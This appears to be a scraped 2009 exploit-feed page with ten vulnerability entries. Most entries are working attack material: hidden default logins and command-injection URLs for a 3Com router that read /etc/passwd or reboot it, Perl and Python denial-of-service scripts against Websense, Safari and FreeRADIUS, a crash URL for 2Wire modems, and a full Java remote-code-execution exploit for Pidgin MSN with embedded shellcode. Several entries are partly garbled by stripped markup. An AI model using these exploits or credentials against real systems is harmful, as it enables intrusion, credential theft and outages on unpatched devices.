Last 10 Vulnerabilitites

Palm Pre Webos Version <= 1.1 Floating Point Exception

Tue, 10 Nov 2009 07:56:26 +0000

I.  Description 

The Palm Pre WebOS version <= 1.1 suffers from a floating point exception vulnerability when 
attempting to view a specially crafted web page. This vulnerability has been addressed in the latest 
patch from Palm and all users are recommended to update to WebOS version 1.2+. 

II.  Impact 

If a user views a malicious web page that contains specially crafted data, the "LunaSysMgr" process 
will crash, causing the device to simulate a reboot.  The bug itself is a floating point exception 
that crashes the "LunaSysMgr" process and forces the device to restart the process, simulating a 
reboot of the system.  At the time of the discovery, the greatest risk to the system was a denial of 
service condition. 

The crash does not occur when viewing the malicious web page while in landscape mode. 

III. Proof of Concept 

The Palm Pre WebOS version <= 1.1 will crash upon opening a web page that contains 50,280 bytes of 
data or greater and attempts to refresh the page.  Upon viewing the malicious web page the 
LunaSysMgr process will generate a floating point exception and simulate a system "reboot". 

The following code will trigger the issue 

"AAAAA..." using 50280 or more characters after the refresh. 

IV. About 

This vulnerability was discovered by Townsend Ladd Harris  

Vulnerability details will be posted at: 
http://tlhsecurity.blogspot.com/2009/10/palm-pre-webos-version-11-floating.html

3Com Officeconnect Firewall/router Multiple Remote Vulnerabilities

Tue, 10 Nov 2009 07:53:36 +0000

************************************************************** 
Product: 3Com OfficeConnect Firewall/Router 
Website: http://www.3com.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote command execution and password disclosure 
************************************************************** 

####### Admin password disclosure ####### 

1) SSH/Telnet to router using one of these hidden accounts: 
  support:support 
  user:5 
  nobody:admin 
2) Type 9 
3) Type 1 
3) Type 3 to dump the configuration 
4) Locate the sysPassword field: 
    
5) Decode the admin password: 
  roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d 
  qwerty 


####### Remote command execution  ####### 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd 

To see the command output you need to log into the router, however the 
command is executed even the user is not logged in, so if you don't 
have access to the device a DOS is also possible: 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot

Emc Replistor Server (Rep_Serv.exe) 6.3.1.3 Remote Dos

Tue, 10 Nov 2009 07:51:37 +0000



original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html

Websense Email Security Web Administrator Dos

Tue, 10 Nov 2009 07:50:27 +0000

Advisory ID:            NSOADV-2009-002 
 Found Date:             28.09.2009 
 Date Reported:          01.10.2009 
 Release Date:           20.10.2009 
 Author:                 Nikolas Sotiriu 
 Mail:                   nso-research (at) sotiriu.de 
 URL:                    http://sotiriu.de/adv/NSOADV-2009-002.txt 
 Vendor:                 Websense (http://www.websense.com/) 
 Affected Products:      Websense Email Security v7.1 
                         Personal Email Manager v7.1 
 Not Affected Products:  Websense Email Security v7.1 Hotfix 4 
                         Personal Email Manager v7.1 Hotfix 4 
 Remote Exploitable:     Yes 
 Local Exploitable:      Yes 
 Patch Status:           Patched with Hotfix 4 
 Disclosure Policy:      http://sotiriu.de/policy.html 
 Thanks to:              Thierry Zoller: for the permission to use his 
                                         Policy 



Background: 
=========== 

Websense Email Security software incorporates multiple layers of 
real-time Web security and data security intelligence to provide 
leading email protection from converged email and Web 2.0 threats. 
It helps to manage outbound data leaks and compliance risk, and enables 
a consolidated security strategy with the trusted leader in Essential 
Information Protection. 

(Product description from Websense Website) 

The Websense Email Security Web Administrator is a webfrontend, which 
enables you to access the message administration, directory management 
and to view the log. 



Description: 
============ 

The Web Administrator frontend (STEMWADM.EXE) listens by default on port 
TCP/8181. 

If an attacker sends a HTTP Request to port 8181 without waiting for a 
response the webserver crashes. The proof of concept script just sends 
a "GET /index.asp" and closes the socket. The server can not response 
to the request anymore and dies. 

By default the service will always restart after a crash. So the poc 
will send the request until it will be stopped. 



Proof of Concept : 
================== 

#!/usr/bin/perl 
use Socket; 

(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ", 
"  \n"; 

print "\nThe Webserver on http://$target:$port should be dead until", 
"this script is running\n"; 

while (1) { 
$ip = inet_aton($target) || die "host($target) not found.\n"; 
$sockaddr = pack_sockaddr_in($port, $ip); 
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n"; 

connect(SOCKET, $sockaddr) || die "connect $target $port error.\n"; 

print SOCKET "GET /index.asp"; 
print "Request sent ...\n"; 

close(SOCKET); 

sleep 1; 

};

Everfocus Edr1600 Remote Authentication Bypass

Tue, 10 Nov 2009 07:48:42 +0000

************************************************************** 
Product: [b]Everfocus EDR1600[/b] 
Version affected: all 
Website: http://www.everfocus.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote DVR authentication bypass 
************************************************************** 

The EDR1600 firmware don't handle correctly users authentication and sessions. 

This exploit let you to connect to every remote DVR (without username 
and password) and see the live cams :) 

Exploit: http://www.andreafabrizi.it/files/EverFocus_edr1600_Exploit.tar.gz

2Wire Remote Denial Of Service

Tue, 10 Nov 2009 07:45:21 +0000

======================================== 
              2WIRE REMOTE DENIAL OF SERVICE 
        ======================================== 


Device:      2wire Gateway Router/Modem 
Vulnerable Software:   =< 5.29.52 
Vulnerable Models:   1700HG 
        1701HG 
        1800HW 
        2071 
        2700HG 
        2701HG-T 
Release Date:    2009-10-29 
Last Update:    2009-09 
Critical:    Moderately critical 
Impact:    Denial of service 
     Remote router reboot 
Where:      From remote 
     In the remote management interface 
Solution Status:   Vendor issued firmware patches 
        Providers are in charge of applying the patches 
WebVuln Advisory:   1-003 


 BACKGROUND 
======================= 

The remote management interface of some 2wire modems is enabled by 
default. 
This interface runs over SSL on port 50001 with an untrusted issuer 
certificate. 

++Espanol 
Algunos modems 2wire tienen la interfaz remota habilitada por default. 
La interfaz utiliza SSL con un certificado invalido en el puerto 50001. 


  DESCRIPTION 
======================= 

Some 2wire modems are vulnerable to a remote denial of service attack. 
By requesting a special url from the Remote Management interface, an 
unathenticated 
user can remotely reboot the complete device. 

++ 
Algunos modems 2wire son vulnerables a un ataque de denegacion de 
servicio. 
Un usuario no autenticado puede reiniciar el dispositivo enviando una 
peticion a 
la interfaz de Administracion remota. 


 EXPLOIT / POC 
======================= 

https://:50001/xslt?page=%0d%0a 


 WORKAROUND 
======================= 

Disable Remote Management in Firewall -> Advanced Settings. 

++ 
Deshabilitar Administracion remota en Cortafuegos -> Configuracion 
avanzada 


  DISCLOSURE TIMELINE 
======================= 

2009/09/06 - Vulnerability discovered 
2009/09/08 - Vendor contacted 


                 ======================= 

                          h k m 
                       hkm@hakim.ws

Safari 4.0.3 (Win32) Css Remote Denial Of Service Exploit

Tue, 10 Nov 2009 07:38:08 +0000

#!/usr/bin/perl
# ithinkthereforeiexist.pl
# AKA
# Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 11.09.2009
#
# *********************************************************************************************************
# Another remotely triggerable STACK_OVERFLOW in Safari on Windows...
#
# (204.72c): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=000333d8 ebx=000fbd16 ecx=00000000 edx=037b3fd0 esi=037b3fd0 edi=0001bfad
# eip=00ae19af esp=00032ea8 ebp=00032f28 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Safari\CoreFoundation.dll - 
# CoreFoundation!_CFStringEncodeByteStream+0x2d:
# 00ae19af 8365b800        and     dword ptr [ebp-48h],0 ss:0023:00032ee0=00000000
#
# A product of Browser Fuzzer 3 :)
#
# "We do it in the dark, with smiles on our faces"
#
# *********************************************************************************************************
# ithinkthereforeiexist.pl

$html = "ithinkthereforeiexist.html";
$css  = "ithinkthereforeiexist.css";

$size = 114600;

$htmldata = "\n\n\n\n";
$htmldata = $htmldata . "\n\n\n\n";

$cssdata = "#die\n{\nbackground: url(" . "A" x $size . ");\n}";

     open(FD, '>' . $html);
     print FD $htmldata;
     close(FD);

     open(FD, '>' . $css);
     print FD $cssdata;
     close(FD);

Quiksoft Easymail 6 (Addattachment) Remote Buffer Overflow Exploit

Tue, 10 Nov 2009 07:36:40 +0000


    <!--
      -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
      -- 
      -- Its old and the latest version doesn't support this method. 
      -- I was bored and a similar post sparked my interest. 
      -- 
      -- Advisory: http://www.bmgsec.com.au/advisory/48/
      -- 
      -- Written by:
      -- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)
      --  -->
 Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit

Source: http://www.milw0rm.com/exploits/9705

Pidgin Msn <= 2.5.8 Remote Code Execution Exploit

Tue, 10 Nov 2009 07:35:29 +0000

/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
*        Pidgin is a multi-protocol Instant Messenger.
*
*        This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
*        The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
*        which could lead to memory corruption.
*
* Affected versions :
*        Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
*        Windows, Linux, Mac
*
* Fix :
*        Fixed in Pidgin 2.5.9
*        Update to the latest version : http://www.pidgin.im/download/
*
* References :
*        [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
*        [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
*        [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
*        You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
*        javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
*        java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

   private MsnMessenger messenger;
   private String login;
   private String password;
   private String target;

   private int session_id = NumberUtils.getIntRandom();

   private byte shellcode[] = new byte[] {

           /*
            * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
            * sub esp,500
            */
               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


           /*
            * windows/exec - 121 bytes
            * http://www.metasploit.com
            * EXITFUNC=process, CMD=calc.exe
            */
               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
               (byte) 0x00
           };

   // reteip = pointer to the return address in the stack
   // The shellcode will be wrote just before reteip
   // and reteip will automaticly point to the shellcode. It's magic !
   private int reteip = 0x0022CFCC;    //stack on XP SP3-FR Pidgin 2.5.8

   private int neweip;
   private byte[] payload = new byte[shellcode.length + 4];
   private int totallength = reteip + 4;

   public static void main(String[] args) throws Exception {

       if(args.length != 3){
           System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
       }else{
           PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
           exploit.start();
       }

   }

   public PidginExploit(String login, String password, String target){
       this.login = login;
       this.password = password;
       this.target = target;

       neweip = reteip - shellcode.length ;

       for(int i=0;i> 8);
       payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
       payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
   }

   public void start() {
       messenger = MsnMessengerFactory.createMsnMessenger(login,password);
       messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

       messenger.setLogIncoming(false);
       messenger.setLogOutgoing(false);

       initMessenger(messenger);
       messenger.login();
   }

   protected void initMessenger(MsnMessenger messenger) {

   messenger.addContactListListener(new MsnContactListAdapter() {

           public void contactListInitCompleted(MsnMessenger messenger) {

               final Object id = new Object();

               messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

                   public void switchboardStarted(MsnSwitchboard switchboard) {

                       if (id != switchboard.getAttachment())
                           return;

                       switchboard.inviteContact(Email.parseStr(target));
                   }

                   public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                       if (id != switchboard.getAttachment())
                           return;

                       MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
                       msg.setIdentifier(NumberUtils.getIntRandom());
                       msg.setSessionId(session_id);
                       msg.setOffset(0);
                       msg.setTotalLength(totallength);
                       msg.setCurrentLength(totallength);

                       // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
                       // We'll use this buffer to rewrite memory in the stack
                       msg.setFlag(0x1000020);

                       msg.setP2PDest(target);

                       switchboard.sendMessage(msg);

                       System.out.println("First packet sent, waiting for the ACK");

                   }

                   public void switchboardClosed(MsnSwitchboard switchboard) {
                       System.out.println("switchboardClosed");
                       switchboard.getMessenger().removeSwitchboardListener(this);
                   }

                   public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
                       System.out.println("contactLeaveSwitchboard");
                   }
               });
               messenger.newSwitchboard(id);
           }
       });

       messenger.addMessageListener(new MsnMessageAdapter(){

           public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

               //We receive the ACK of our first packet with the ID of the new bogus packet
               message.getIdentifier();

               MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
                       payload.length, payload, target);

               switchboard.sendMessage(msg);
               System.out.println("ACK received && Payload sent !");
               System.out.println("Exploit OK ! CTRL+C to quit");

           }
       });



       messenger.addMessengerListener(new MsnMessengerAdapter() {

           public void loginCompleted(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " login");
           }

           public void logout(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " logout");
           }

           public void exceptionCaught(MsnMessenger messenger,
                   Throwable throwable) {
               System.out.println("caught exception: " + throwable);
           }
       });

   }
}

Source: http://www.milw0rm.com/exploits/9615

Freeradius < 1.1.8 Remote Packet Of Death Exploit (Cve-2009-3111)

Tue, 10 Nov 2009 07:34:23 +0000

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py \n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
	Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
	RadiusAttr(type=69,value="",len=2)

send(PoD)

Source: http://www.milw0rm.com/exploits/9642